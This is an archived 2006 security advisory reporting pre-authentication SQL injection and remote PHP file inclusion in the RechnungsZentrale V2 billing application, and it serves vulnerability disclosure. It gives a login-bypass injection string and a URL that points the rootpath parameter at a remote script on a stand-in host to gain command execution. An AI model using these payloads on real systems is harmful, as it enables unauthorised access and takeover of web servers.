TUCoPS :: Web :: Apps :: b06-1717.htm

RechnungsZentrale V2 - SQL injection and Remote PHP inclusion vulnerabilities
RechnungsZentrale V2 - SQL injection and Remote PHP inclusion vulnerabilities
RechnungsZentrale V2 - SQL injection and Remote PHP inclusion vulnerabilities



    ----------------------------------------------------------------------------------
    - GroundZero Security Research and Software Development 2006                     - 
    ----------------------------------------------------------------------------------
    -                                                                                -
    -  Security Advisory regarding RechnungsZentrale v2.                             -
    -  SQL Injection and Remote File inclusion Vulnerabilities.                      -
    -  Released: Tue Apr 18 18:00:00 CEST 2006                                       -
    -                                                                                -
    ----------------------------------------------------------------------------------



    ----------------------------------------------------------------------------------
    - Affected:                                                                      -
    ----------------------------------------------------------------------------------

    Software:	RechnungsZentrale V2
    Version:	1.1.3, likely older versions are affected aswell.
Vendor: 	http://www.nfec.de/ 


    ----------------------------------------------------------------------------------
    - Information:                                                                   -
    ----------------------------------------------------------------------------------

    "RechnungsZentrale V2 is a multiuser, Web-based billing application. 
     It facilitates the creation of bills and the management of customers. 
     It is written in PHP and uses MySQL. It supports German, English, French, 
     and Dansk languages."

    The Software contains vulnerabilities which allow an Attacker to conduct
    SQL injection and Remote File inclusion Attacks prior to Authentication.

    The SQL injection vulnerabilitie exists in the login script (authent.php4) and 
    allows an Attacker to log into the internal Interface or execute malicious 
    SQL commands.

    PoC:
    	User: ' OR '1'='1
    	Password: 1


    In the same script it is possible to include a remote php by pointing the 
    "rootpath=" option to a remote PHP script with a system() or passthru() function.
   
    Doing so would allow an unauthenticated Attacker to execute shell commands with 
    permissions of the Web Server. 

    PoC: 
http://www.victim.tld/mod/authent.php4?rootpath=Http://server.tld/mod/db.php4 


    ----------------------------------------------------------------------------------
    - Vendor Response:                                                               -
    ----------------------------------------------------------------------------------

    Notified: 	Tue Apr 18 16:12:14 CEST 2006
    Response: 	Tue Apr 18 17:13:14 CEST 2006 
	      	(Development Discontinued)
    Disclosure:	Tue Apr 18 18:00:00 CEST 2006


    ----------------------------------------------------------------------------------
    - Bugs discovered by GroundZero Security Research and Software Development       -
- http://www.GroundZero-Security.com | Http://www.g-0.org - 
    ----------------------------------------------------------------------------------

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH